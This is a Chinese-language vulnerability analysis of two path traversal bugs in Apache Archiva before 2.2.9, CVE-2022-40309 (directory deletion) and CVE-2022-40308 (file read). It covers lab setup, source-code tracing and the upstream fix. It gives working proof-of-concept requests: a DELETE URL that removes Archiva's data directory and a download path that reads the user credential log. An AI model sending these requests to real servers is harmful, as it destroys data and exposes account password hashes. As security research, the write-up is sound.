Apache Archiva 任意目录删除(CVE-2022-40309) 和任意文件读取(CVE-2022-40308)

Apache Archiva是一个存储库管理软件，2.2.9以下版本在删除或者下载Artifact时，可以在目录或者文件名中注入目录穿越符，导致任意目录删除/任意文件读取漏洞。

CVE-2022-40309

影响范围

Apache Archiva < 2.2.9

环境搭建

https://archive.apache.org/dist/archiva/2.2.8/binaries/apache-archiva-2.2.8-bin.zip

https://codeload.github.com/apache/archiva/zip/refs/tags/archiva-2.2.8

1	./bin/archiva console

1	.\bin\archiva.bat console

可以提前在conf/wrapper.conf添加如下配置，方便IDEA远程调试

1	wrapper.java.additional.9=-agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=5005

首次运行需要添加Admin用户，注意需要勾选Validated复选框：

http://127.0.0.1:8080/#open-admin-create-box

漏洞复现

前置条件是需要用户拥有archiva-delete-artifact操作权限，使用首次添加的系统管理员账号或者角色为Repository Manager - internal的账号都可，其次需要存储库中有Artifact

先上传一个Artifact到Archiva Managed Internal Repository

保存之后文件会储存在repositories/internal/com/test/test/1.0/test-1.0.jar

在/#browse页面点进group然后删除project时抓包，如果此页面为空的话可以重启一下Archiva

可以抓到如下DELETE请求

1	DELETE /restServices/archivaServices/repositoriesService/project/internal/com.test/test

在projectid后面添加POC%2f..%2f..%2f..%2f..%2f..%2fdata，这将删除Archiva根目录下的data目录

1	DELETE /restServices/archivaServices/repositoriesService/project/internal/com.test/test%2f..%2f..%2f..%2f..%2f..%2fdata

漏洞分析

入口在 org.apache.archiva.rest.api.services.RepositoriesService#deleteProject

@Path ("project/{repositoryId}/{groupId}/{projectId}")
@DELETE
@Produces ({ MediaType.APPLICATION_JSON, MediaType.APPLICATION_XML, MediaType.TEXT_PLAIN })
@RedbackAuthorization (noPermission = true)
Boolean deleteProject( @PathParam ("groupId") String groupId, @PathParam ("projectId") String projectId,
                       @PathParam ("repositoryId") String repositoryId )
    throws ArchivaRestServiceException;

org.apache.archiva.rest.services.DefaultRepositoriesService#deleteProject

public Boolean deleteProject( String groupId, String projectId, String repositoryId )
    throws ArchivaRestServiceException
{
...
    if ( !isAuthorizedToDeleteArtifacts( repositoryId ) )
    {
        throw new ArchivaRestServiceException( "not authorized to delete artifacts", 403, null );
    }

...
    try
    {
        ManagedRepositoryContent repository = repositoryFactory.getManagedRepositoryContent( repositoryId );

        repository.deleteProject( groupId, projectId );
    }
...
}

isAuthorizedToDeleteArtifacts 限制登录用户需要有archiva-delete-artifact权限

在repository.deleteProject( groupId, projectId )中直接拼接了目录名进行删除

org.apache.archiva.repository.content.maven2.ManagedDefaultRepositoryContent#deleteProject

漏洞修复

https://github.com/apache/archiva/commit/930460424c715f52a7cb5eef5b084a7a8ef31fb5#diff-bde5305e671d2bdf9f05df227a6fa706f87b911c28799575537f806a063a9134R95

CVE-2022-40308

影响范围

Apache Archiva < 2.2.9

环境搭建

同上

漏洞复现

前置条件是启用匿名读取或者使用拥有archiva-read-repository权限的用户

在如下界面点击下载然后抓包

修改URL为/repository/internal/..//../data/databases/users/log/log1.dat，这将会读取Archiva根目录下的data/databases/users/log/log1.dat文件，该文件会记录系统用户账号及加密后的密码

漏洞分析

由web.xml

<servlet-mapping>
  <servlet-name>RepositoryServlet</servlet-name>
  <url-pattern>/repository/*</url-pattern>
</servlet-mapping>

入口在RepositoryServlet，而且POC/repository/internal/..///../data/databases/users/log/log1.dat中的..///..必须是两个及以上数量的/，如果URL为/repository/internal/../../data/databases/users/log/log1.dat，则Jetty会认为请求的是/data/databases/users/log/log1.dat而非/repository/*

org.apache.archiva.webdav.RepositoryServlet#service

protected void service( HttpServletRequest request, HttpServletResponse response )
    throws ServletException, IOException
{
    WebdavRequest webdavRequest = new WebdavRequestImpl( request, getLocatorFactory() );
    // DeltaV requires 'Cache-Control' header for all methods except 'VERSION-CONTROL' and 'REPORT'.
    int methodCode = DavMethods.getMethodCode( request.getMethod() );
    boolean noCache = DavMethods.isDeltaVMethod( webdavRequest ) && !( DavMethods.DAV_VERSION_CONTROL == methodCode
        || DavMethods.DAV_REPORT == methodCode );
    WebdavResponse webdavResponse = new WebdavResponseImpl( response, noCache );
    DavResource resource = null;

    try
    {
        // make sure there is a authenticated user
        if ( !getDavSessionProvider().attachSession( webdavRequest ) )
        {
            return;
        }

        // check matching if=header for lock-token relevant operations
        resource =
            getResourceFactory().createResource( webdavRequest.getRequestLocator(), webdavRequest, webdavResponse );

        if ( !isPreconditionValid( webdavRequest, resource ) )
        {
            webdavResponse.sendError( DavServletResponse.SC_PRECONDITION_FAILED );
            return;
        }
        if ( !execute( webdavRequest, webdavResponse, methodCode, resource ) )
        {
            super.service( request, response );
        }

    }
...
}

跟入getResourceFactory().createResource

org.apache.archiva.webdav.ArchivaDavResourceFactory#createResource(org.apache.jackrabbit.webdav.DavResourceLocator, org.apache.jackrabbit.webdav.DavServletRequest, org.apache.jackrabbit.webdav.DavServletResponse)